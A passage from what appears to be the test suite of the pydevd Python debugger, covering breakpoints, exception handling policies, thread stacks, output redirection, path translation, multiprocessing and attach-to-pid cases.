with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exception_get_stack.py',
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_get_thread_stack(hit.thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == hit.thread_id
if not files[0].endswith('_debugger_case_unhandled_exception_get_stack.py'):
raise AssertionError('Expected to find _debugger_case_unhandled_exception_get_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
assert len(msg.thread.frame) == 0 # No back frames (stopped in main).
assert msg.thread.frame['name'] == '<module>'
assert msg.thread.frame['line'] == str(writer.get_line_index_with_content('break line on unhandled exception'))
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_get_next_statement_targets(case_setup):
with case_setup.test_file('_debugger_case_get_next_statement_targets.py') as writer:
breakpoint_id = writer.write_add_breakpoint(21, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=21)
writer.write_get_next_statement_targets(hit.thread_id, hit.frame_id)
targets = writer.wait_for_get_next_statement_targets()
expected = set((2, 3, 5, 8, 9, 10, 12, 13, 14, 15, 17, 18, 19, 21))
assert targets == expected, 'Expected targets to be %s, was: %s' % (expected, targets)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_type_ext(case_setup):
# Custom type presentation extensions
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
return env
with case_setup.test_file('_debugger_case_type_ext.py', get_environ=get_environ) as writer:
writer.get_environ = get_environ
writer.write_add_breakpoint(7, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
assert writer.wait_for_var([
[
r'<var name="my_rect" type="Rect" qualifier="__main__" value="Rectangle%255BLength%253A 5%252C Width%253A 10 %252C Area%253A 50%255D" isContainer="True" />',
r'<var name="my_rect" type="Rect" value="Rect: <__main__.Rect object at', # Jython
]
])
writer.write_get_variable(hit.thread_id, hit.frame_id, 'my_rect')
assert writer.wait_for_var(r'<var name="area" type="int" qualifier="{0}" value="int%253A 50" />'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON or IS_JYTHON, reason='Failing on IronPython and Jython (needs to be investigated).')
def test_case_event_ext(case_setup):
def get_environ(self):
env = os.environ.copy()
python_path = env.get("PYTHONPATH", "")
ext_base = debugger_unittest._get_debugger_test_file('my_extensions')
env['PYTHONPATH'] = ext_base + os.pathsep + python_path if python_path else ext_base
env["VERIFY_EVENT_TEST"] = "1"
return env
# Test initialize event for extensions
with case_setup.test_file('_debugger_case_event_ext.py', get_environ=get_environ) as writer:
original_additional_output_checks = writer.additional_output_checks
@overrides(writer.additional_output_checks)
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'INITIALIZE EVENT RECEIVED' not in stdout:
raise AssertionError('No initialize event received')
writer.additional_output_checks = additional_output_checks
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Jython does not seem to be creating thread started inside tracing (investigate).')
def test_case_writer_creation_deadlock(case_setup):
# check case where there was a deadlock evaluating expressions
with case_setup.test_file('_debugger_case_thread_creation_deadlock.py') as writer:
writer.write_add_breakpoint(26, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
assert hit.line == 26, 'Expected return to be in line 26, was: %s' % (hit.line,)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'create_thread()')
writer.wait_for_evaluation('<var name="create_thread()" type="str" qualifier="{0}" value="str: create_thread:ok'.format(builtin_qualifier))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_skip_breakpoints_in_exceptions(case_setup):
# Case where breakpoint is skipped after an exception is raised over it
with case_setup.test_file('_debugger_case_skip_breakpoint_in_exceptions.py') as writer:
writer.write_add_breakpoint(5, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('111', line=5)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions0(case_setup):
# Stop only once per handled exception.
with case_setup.test_file('_debugger_case_exceptions.py') as writer:
writer.write_set_project_roots([os.path.dirname(writer.TEST_FILE)])
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=2, # Notify only once
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION,
line=writer.get_line_index_with_content('raise indexerror line')
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_handled_exceptions1(case_setup):
# Stop multiple times for the same handled exception.
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
def check(hit):
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_message(accept_message=lambda msg:'__exception__' in msg and 'IndexError' in msg, unquote_msg=False)
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:'IndexError' in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert msg.thread['exc_desc'] == 'foo'
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.IndexError'>", # py2
"<class 'IndexError'>" # py3
)
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_exceptions.py')
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
check(hit)
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('handle on method1'))
check(hit)
writer.finished_ok = True
def test_case_handled_exceptions2(case_setup):
# No IDE_PROJECT_ROOTS set.
def get_environ(self):
env = os.environ.copy()
# Don't stop anywhere (note: having IDE_PROJECT_ROOTS = '' will consider
# having anything not under site-packages as being in the project).
env["IDE_PROJECT_ROOTS"] = '["empty"]'
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy(
'IndexError',
notify_on_handled_exceptions=1, # Notify multiple times
notify_on_unhandled_exceptions=0,
ignore_libraries=1
)
writer.write_make_initial_run()
writer.finished_ok = True
def test_case_handled_exceptions3(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=False,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('raise indexerror line'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_handled_exceptions4(case_setup):
# Don't stop on exception thrown in the same context (only at caller).
def get_environ(self):
env = os.environ.copy()
env["IDE_PROJECT_ROOTS"] = os.path.dirname(self.TEST_FILE)
return env
with case_setup.test_file('_debugger_case_exceptions.py', get_environ=get_environ) as writer:
# Note: in this mode we'll only stop once.
writer.write_set_py_exception_globals(
break_on_uncaught=False,
break_on_caught=True,
skip_on_exceptions_thrown_in_same_context=True,
ignore_exceptions_thrown_in_lines_with_ignore_exception=True,
ignore_libraries=True,
exceptions=('IndexError',)
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(
REASON_CAUGHT_EXCEPTION, line=writer.get_line_index_with_content('reraise on method2'))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_settrace(case_setup):
with case_setup.test_file('_debugger_case_settrace.py') as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('108', line=12)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(line=7)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(True or IS_PY26 or IS_JYTHON, reason='This is *very* flaky. Scapy only supports 2.7 onwards, not available for jython.')
def test_case_scapy(case_setup):
with case_setup.test_file('_debugger_case_scapy.py') as writer:
writer.FORCE_KILL_PROCESS_WHEN_FINISHED_OK = True
writer.reader_thread.set_messages_timeout(30) # Starting scapy may be slow (timed out with 15 seconds on appveyor).
writer.write_add_breakpoint(2, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_APPVEYOR or IS_JYTHON, reason='Flaky on appveyor / Jython encoding issues (needs investigation).')
def test_redirect_output(case_setup):
def get_environ(writer):
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
return env
with case_setup.test_file('_debugger_case_redirect.py', get_environ=get_environ) as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
return line.startswith((
'text',
'binary',
'a'
))
writer._ignore_stderr_line = _ignore_stderr_line
# Note: writes to stdout and stderr are now synchronous (so, the order
# must always be consistent and there's a message for each write).
expected = [
'text\n',
'binary or text\n',
'ação1\n',
]
if sys.version_info[0] >= 3:
expected.extend((
'binary\n',
'ação2\n'.encode(encoding='latin1').decode('utf-8', 'replace'),
'ação3\n',
))
new_expected = [(x, 'stdout') for x in expected]
new_expected.extend([(x, 'stderr') for x in expected])
writer.write_start_redirect()
writer.write_make_initial_run()
msgs = []
ignored = []
while len(msgs) < len(new_expected):
try:
msg = writer.wait_for_output()
except AssertionError:
for msg in msgs:
sys.stderr.write('Found: %s\n' % (msg,))
for msg in new_expected:
sys.stderr.write('Expected: %s\n' % (msg,))
for msg in ignored:
sys.stderr.write('Ignored: %s\n' % (msg,))
raise
if msg not in new_expected:
ignored.append(msg)
continue
msgs.append(msg)
if msgs != new_expected:
print(msgs)
print(new_expected)
assert msgs == new_expected
writer.finished_ok = True
def _path_equals(path1, path2):
path1 = pydevd_file_utils.normcase(path1)
path2 = pydevd_file_utils.normcase(path2)
return path1 == path2
@pytest.mark.parametrize('mixed_case', [True, False] if sys.platform == 'win32' else [False])
def test_path_translation(case_setup, mixed_case):
def get_file_in_client(writer):
# Instead of using: test_python/_debugger_case_path_translation.py
# we'll set the breakpoints at foo/_debugger_case_path_translation.py
file_in_client = os.path.dirname(os.path.dirname(writer.TEST_FILE))
return os.path.join(os.path.dirname(file_in_client), 'foo', '_debugger_case_path_translation.py')
def get_environ(writer):
import json
env = os.environ.copy()
env["PYTHONIOENCODING"] = 'utf-8'
assert writer.TEST_FILE.endswith('_debugger_case_path_translation.py')
file_in_client = get_file_in_client(writer)
if mixed_case:
new_file_in_client = ''.join([file_in_client[i].upper() if i % 2 == 0 else file_in_client[i].lower() for i in range(len(file_in_client))])
assert _path_equals(file_in_client, new_file_in_client)
env["PATHS_FROM_ECLIPSE_TO_PYTHON"] = json.dumps([
(
os.path.dirname(file_in_client),
os.path.dirname(writer.TEST_FILE)
)
])
return env
with case_setup.test_file('_debugger_case_path_translation.py', get_environ=get_environ) as writer:
from tests_python.debugger_unittest import CMD_LOAD_SOURCE
writer.write_start_redirect()
file_in_client = get_file_in_client(writer)
assert 'tests_python' not in file_in_client
writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'call_this', filename=file_in_client)
writer.write_make_initial_run()
xml = writer.wait_for_message(lambda msg:'stop_reason="111"' in msg)
assert xml.thread.frame[0]['file'] == file_in_client
thread_id = xml.thread['id']
# Request a file that exists
files_to_match = [file_in_client]
if IS_WINDOWS:
files_to_match.append(file_in_client.upper())
for f in files_to_match:
writer.write_load_source(f)
writer.wait_for_message(
lambda msg:
'%s\t' % CMD_LOAD_SOURCE in msg and \
"def main():" in msg and \
"print('break here')" in msg and \
"print('TEST SUCEEDED!')" in msg
, expect_xml=False)
# Request a file that does not exist
writer.write_load_source(file_in_client + 'not_existent.py')
writer.wait_for_message(
lambda msg:'901\t' in msg and ('FileNotFoundError' in msg or 'IOError' in msg),
expect_xml=False)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_evaluate_errors(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_evaluate_expression('%s\t%s\t%s' % (thread_id, frame_id, 'LOCAL'), 'name_error')
writer.wait_for_evaluation('<var name="name_error" type="NameError"')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_list_threads(case_setup):
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
seq = writer.write_list_threads()
msg = writer.wait_for_list_threads(seq)
assert msg.thread['name'] == 'MainThread'
assert msg.thread['id'].startswith('pid')
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_print(case_setup):
with case_setup.test_file('_debugger_case_print.py') as writer:
writer.write_add_breakpoint(1, 'None')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working on Jython (needs to be investigated).')
def test_case_lamdda(case_setup):
with case_setup.test_file('_debugger_case_lamda.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'None')
writer.write_make_initial_run()
for _ in range(3): # We'll hit the same breakpoint 3 times.
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_case_suspension_policy(case_setup):
with case_setup.test_file('_debugger_case_suspend_policy.py') as writer:
writer.write_add_breakpoint(25, '', suspend_policy='ALL')
writer.write_make_initial_run()
thread_ids = []
for i in range(3):
writer.log.append('Waiting for thread %s of 3 to stop' % (i + 1,))
# One thread is suspended with a breakpoint hit and the other 2 as thread suspended.
hit = writer.wait_for_breakpoint_hit((REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND))
thread_ids.append(hit.thread_id)
for thread_id in thread_ids:
writer.write_run_thread(thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Flaky on Jython (needs investigation).')
def test_case_get_thread_stack(case_setup):
with case_setup.test_file('_debugger_case_get_thread_stack.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
@overrides(writer._ignore_stderr_line)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
if IS_JYTHON:
for expected in (
"RuntimeWarning: Parent module '_pydev_bundle' not found while handling absolute import",
"from java.lang import System"):
if expected in line:
return True
return False
writer._ignore_stderr_line = _ignore_stderr_line
writer.write_add_breakpoint(18, None)
writer.write_make_initial_run()
thread_created_msgs = [writer.wait_for_message(CMD_THREAD_CREATE)]
thread_created_msgs.append(writer.wait_for_message(CMD_THREAD_CREATE))
thread_id_to_name = {}
for msg in thread_created_msgs:
thread_id_to_name[msg.thread['id']] = msg.thread['name']
assert len(thread_id_to_name) == 2
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
assert hit.thread_id in thread_id_to_name
for request_thread_id in thread_id_to_name:
writer.write_get_thread_stack(request_thread_id)
msg = writer.wait_for_get_thread_stack_message()
files = [frame['file'] for frame in msg.thread.frame]
assert msg.thread['id'] == request_thread_id
if not files[0].endswith('_debugger_case_get_thread_stack.py'):
raise AssertionError('Expected to find _debugger_case_get_thread_stack.py in files[0]. Found: %s' % ('\n'.join(files),))
if ([filename for filename in files if filename.endswith('pydevd.py')]):
raise AssertionError('Did not expect to find pydevd.py. Found: %s' % ('\n'.join(files),))
if request_thread_id == hit.thread_id:
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
else:
assert len(msg.thread.frame) > 1 # Stopped in threading (must have back frames).
assert msg.thread.frame[0]['name'] == 'method'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_dump_threads_to_stderr(case_setup):
from tests_python.debugger_unittest import wait_for_condition
def additional_output_checks(writer, stdout, stderr):
assert is_stderr_ok(stderr), make_error_msg(stderr)
def make_error_msg(stderr):
return 'Did not find thread dump in stderr. stderr:\n%s' % (stderr,)
def is_stderr_ok(stderr):
return 'Thread Dump' in stderr and 'Thread pydevd.CommandThread (daemon: True, pydevd thread: True)' in stderr
with case_setup.test_file(
'_debugger_case_get_thread_stack.py', additional_output_checks=additional_output_checks) as writer:
writer.write_add_breakpoint(12, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_dump_threads()
wait_for_condition(
lambda: is_stderr_ok(writer.get_stderr()),
lambda: make_error_msg(writer.get_stderr())
)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_regular(case_setup):
with case_setup.test_file('_debugger_case_simple_calls.py') as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_simple_calls.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_breakpoint_cases():
if sys.version_info >= (3, 7):
# Just check breakpoint()
return ('_debugger_case_breakpoint.py',)
else:
# Check breakpoint() and sys.__breakpointhook__ replacement.
return ('_debugger_case_breakpoint.py', '_debugger_case_breakpoint2.py')
@pytest.mark.parametrize("filename", _get_breakpoint_cases())
def test_py_37_breakpoint(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(file=filename, line=3)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def _get_generator_cases():
if IS_PY2:
return ('_debugger_case_generator_py2.py',)
else:
# On py3 we should check both versions.
return (
'_debugger_case_generator_py2.py',
'_debugger_case_generator_py3.py',
)
@pytest.mark.parametrize("filename", _get_generator_cases())
def test_generator_cases(case_setup, filename):
with case_setup.test_file(filename) as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_m_switch.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_stop_on_start_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.write_stop_on_start()
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STEP_INTO_MY_CODE, file='_debugger_case_module_entry_point.py', line=1)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Not working properly on Jython (needs investigation).')
def test_debug_zip_files(case_setup, tmpdir):
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
curr_pythonpath = str(tmpdir.join('myzip.zip')) + os.pathsep + curr_pythonpath
curr_pythonpath = str(tmpdir.join('myzip2.egg!')) + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
env["IDE_PROJECT_ROOTS"] = str(tmpdir.join('myzip.zip'))
return env
import zipfile
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip.zip')), 'w')
zip_file.writestr('zipped/__init__.py', '')
zip_file.writestr('zipped/zipped_contents.py', 'def call_in_zip():\n return 1')
zip_file.close()
zip_file = zipfile.ZipFile(
str(tmpdir.join('myzip2.egg!')), 'w')
zip_file.writestr('zipped2/__init__.py', '')
zip_file.writestr('zipped2/zipped_contents2.py', 'def call_in_zip2():\n return 1')
zip_file.close()
with case_setup.test_file('_debugger_case_zip_files.py', get_environ=get_environ) as writer:
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip.zip')), 'zipped', 'zipped_contents.py')
)
writer.write_add_breakpoint(
2,
'None',
filename=os.path.join(str(tmpdir.join('myzip2.egg!')), 'zipped2', 'zipped_contents2.py')
)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip'
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
assert hit.name == 'call_in_zip2'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
@pytest.mark.parametrize('file_to_check', [
'_debugger_case_multiprocessing.py',
'_debugger_case_python_c.py',
'_debugger_case_multiprocessing_pool.py'
])
def test_multiprocessing_simple(case_setup_multiprocessing, file_to_check):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file(file_to_check) as writer:
break1_line = writer.get_line_index_with_content('break 1 here')
break2_line = writer.get_line_index_with_content('break 2 here')
writer.write_add_breakpoint(break1_line)
writer.write_add_breakpoint(break2_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
expected_connections = 1
if sys.platform != 'win32' and IS_PY2 and file_to_check == '_debugger_case_python_c.py':
# Note: on linux on Python 2 CPython subprocess.call will actually
# create a fork first (at which point it'll connect) and then, later on it'll
# call the main (as if it was a clean process as if PyDB wasn't created
# the first time -- the debugger will still work, but it'll do an additional
# connection).
expected_connections = 2
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break1_line)
writer2.write_add_breakpoint(break2_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_multiprocessing_with_stopped_breakpoints(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_multiprocessing_stopped_threads.py') as writer:
break_main_line = writer.get_line_index_with_content('break in main here')
break_thread_line = writer.get_line_index_with_content('break in thread here')
break_process_line = writer.get_line_index_with_content('break in process here')
writer.write_add_breakpoint(break_main_line)
writer.write_add_breakpoint(break_thread_line)
writer.write_add_breakpoint(break_process_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_main_line)
writer2.write_add_breakpoint(break_thread_line)
writer2.write_add_breakpoint(break_process_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
hit2 = writer.wait_for_breakpoint_hit() # Breaks in thread.
writer.write_step_over(hit2.thread_id)
hit2 = writer.wait_for_breakpoint_hit(REASON_STEP_OVER) # line == event.set()
# paused on breakpoint, will start process and pause on main thread
# in the main process too.
writer.write_step_over(hit2.thread_id)
# Note: ignore the step over hit (go only for the breakpoint hit).
main_hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.write_run_thread(hit2.thread_id)
writer.write_run_thread(main_hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_subprocess_quoted_args(case_setup_multiprocessing):
import threading
from tests_python.debugger_unittest import AbstractWriterThread
with case_setup_multiprocessing.test_file('_debugger_case_quoting.py') as writer:
break_subprocess_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(break_subprocess_line)
server_socket = writer.server_socket
class SecondaryProcessWriterThread(AbstractWriterThread):
TEST_FILE = writer.get_main_filename()
_sequence = -1
class SecondaryProcessThreadCommunication(threading.Thread):
def run(self):
from tests_python.debugger_unittest import ReaderThread
# Note: on linux on Python 2 because on Python 2 CPython subprocess.call will actually
# create a fork first (at which point it'll connect) and then, later on it'll
# call the main (as if it was a clean process as if PyDB wasn't created
# the first time -- the debugger will still work, but it'll do an additional
# connection.
expected_connections = 1
if sys.platform != 'win32' and IS_PY2:
expected_connections = 2
for _ in range(expected_connections):
server_socket.listen(1)
self.server_socket = server_socket
new_sock, addr = server_socket.accept()
reader_thread = ReaderThread(new_sock)
reader_thread.name = ' *** Multiprocess Reader Thread'
reader_thread.start()
writer2 = SecondaryProcessWriterThread()
writer2.reader_thread = reader_thread
writer2.sock = new_sock
writer2.write_version()
writer2.write_add_breakpoint(break_subprocess_line)
writer2.write_make_initial_run()
hit = writer2.wait_for_breakpoint_hit()
writer2.write_run_thread(hit.thread_id)
secondary_process_thread_communication = SecondaryProcessThreadCommunication()
secondary_process_thread_communication.start()
writer.write_make_initial_run()
secondary_process_thread_communication.join(10)
if secondary_process_thread_communication.is_alive():
raise AssertionError('The SecondaryProcessThreadCommunication did not finish')
writer.finished_ok = True
def _attach_to_writer_pid(writer):
import pydevd
assert writer.process is not None
def attach():
attach_pydevd_file = os.path.join(os.path.dirname(pydevd.__file__), 'pydevd_attach_to_process', 'attach_pydevd.py')
subprocess.call([sys.executable, attach_pydevd_file, '--pid', str(writer.process.pid), '--port', str(writer.port)])
threading.Thread(target=attach).start()
wait_for_condition(lambda: writer.finished_initialization)
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_attach_to_pid_no_threads(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_simple.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize to get to the while loop.
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_attach_to_pid_halted(case_setup_remote):
with case_setup_remote.test_file('_debugger_case_attach_to_pid_multiple_threads.py', wait_for_port=False) as writer:
time.sleep(1) # Give it some time to initialize and get to the proper halting condition
_attach_to_writer_pid(writer)
bp_line = writer.get_line_index_with_content('break thread here')
writer.write_add_breakpoint(bp_line)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(line=bp_line)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'wait', 'False')
writer.wait_for_var('<xml><var name="" type="bool"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
